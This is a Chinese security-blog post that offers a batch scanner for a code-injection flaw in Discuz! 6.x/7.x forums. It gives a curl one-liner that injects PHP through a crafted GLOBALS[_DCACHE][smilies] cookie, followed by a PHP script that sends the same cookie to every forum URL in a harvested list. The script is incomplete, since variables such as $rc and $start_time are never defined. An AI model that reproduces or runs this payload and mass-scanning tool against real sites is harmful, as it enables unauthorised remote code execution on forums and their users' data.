Discuz! 6.x/7.x 批量检测脚本

  • A+
所属分类:安全博客

用法 先 用抓取url工具 抓取 若干 url (url为 带表情的帖子,或回复)
存放至 dz.txt 文件 然后执行本脚本

漏洞利用请关注 第82楼

单个测试语句(windows):

1
curl 'http://bbs.test.com/viewthread.php?tid=29958' -s --cookie 'GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();' |findstr /i /c:'<h2>PHP License</h2>'

有返回说明有洞

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php

$rc->__set('time_out', $timeout); //设置超时时间

$urls=file('dz.txt');

foreach ($urls as $url) {
//$url=trim($url);
$request = new RollingCurlRequest(trim($url));
$request->options = array(CURLOPT_HTTPHEADER => array('Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();'));

$rc->add($request);
}
$rc->execute();
//时间统计函数
function func_time()
{
list($microsec, $sec) = explode(' ', microtime());
return $microsec + $sec;
}

echo '\r\n'.'time: ' . round((func_time() – $start_time), 4) . 'sec ';
?>

Source:wolvez.club | Author:wolvez

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: